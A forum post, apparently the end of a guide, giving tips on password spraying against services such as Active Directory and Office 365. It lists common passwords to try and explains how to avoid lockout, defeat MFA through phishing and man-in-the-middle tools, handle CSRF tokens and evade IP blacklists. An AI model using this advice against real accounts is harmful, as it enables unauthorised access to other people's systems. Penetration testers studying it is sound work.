Moshoes
Supreme
- Joined
- 11.01.24
- Messages
- 41
- Reaction score
- 23
- Points
- 8
TIPS
What to watch our for
You will undoubtedly encounter some of the following when attempting to log in using brute force or password-spraying methods.
Account Lockout PoliciesBefore spraying passwords, try to understand the account lockout policy of the targeted service. Let’s take Active Directory as an example. In Active Directory, most often, the lockout policy will be in place with, let’s say, ten invalid login attempts. If users enter an incorrect password ten times consecutively, their account will be locked. The lockout duration is set to 30 minutes by default, which means the user will be unable to log in for that time period.
Your best bet in situations like this is to try to spread out your attempts by trying a single password across multiple different account names. Try to use some of the most common passwords used with Active Directory, such as:
P@ssw0rd01, Password123, Password1, Hello123, Welcome1/Welcome01$Companyname1Winter2023*, Spring2023!, Summer2023?, Summer2023, July2023! (Depending on the time of year your testing is taking place) Multi-Factor AuthenticationYou may also run into a situation where you successfully log in to a service, but then you realize the user has set up MFA (Multi-Factor Authentication). Where do you go from here? There are a few ways you can accomplish this.
Social Engineering: A well-crafted phishing attack could trick users into providing their MFA token. This method, however, requires timing and precision because MFA tokens usually expire quickly.
Man-in-the-Middle (MitM) Attacks: In this method, you place yourself between the user's communication and the service. When the user enters their MFA token, you intercept and use it to authenticate their session. Evilginx2 (https://github.com/kgretzky/evilginx2) and CredSniper (https://github.com/ustayready/CredSniper) are a couple of tools that can help with this.
CSRF TokensIn certain situations, you may be up against anti-CSRF tokens when attempting a brute-force attack. A new CSRF token must be fetched from the server for every login attempt, as each token is typically unique per session or request. This effectively means that for each login attempt, we would need to fetch a new login page, parse it to extract the CSRF token, and then use it in the login request.
To overcome this, you could use advanced tools like Burp Suite to update CSRF tokens while using Intruder automatically or automate the process by writing scripts in Python.
IP BlacklistsWhile attempting brute force attacks, you may also be subject to IP blacklisting. IP blacklisting is a security measure that blocks traffic originating from particular IP addresses. Systems may implement this to prevent repeated failed login attempts, indicating a brute force attack.
There are a few ways we can circumvent this. To bypass the blacklist, you can use a proxy server or VPN to change your IP address, utilize cloud-based services, or use virtual machines to test from different IP addresses.
Or use a script like TREVORspray (https://github.com/blacklanternsecurity/TREVORspray) from GitHub.
TREVORspray is a password sprayer that can take advantage of SSH proxying. It logs in to multiple different systems (such as AWS virtual machines, each with a different IP address) and takes turns attacking a password portal from each to avoid blacklisting the IPs because of too many failed attempts in a short period from a single IP.
It supports attacking various services like Office 365, Active Directory Federated Services, Outlook Web App, Okta SSO, and Cisco VPN. It also supports Office 365 MFA bypass.
ConclusionYou should now better understand how to guess a password.
I have walked you through common weak passwords, what parameters must be established before beginning, how to use OSINT to find passwords, different tools used while cracking or brute forcing, and what you need to watch out for when performing attacks.
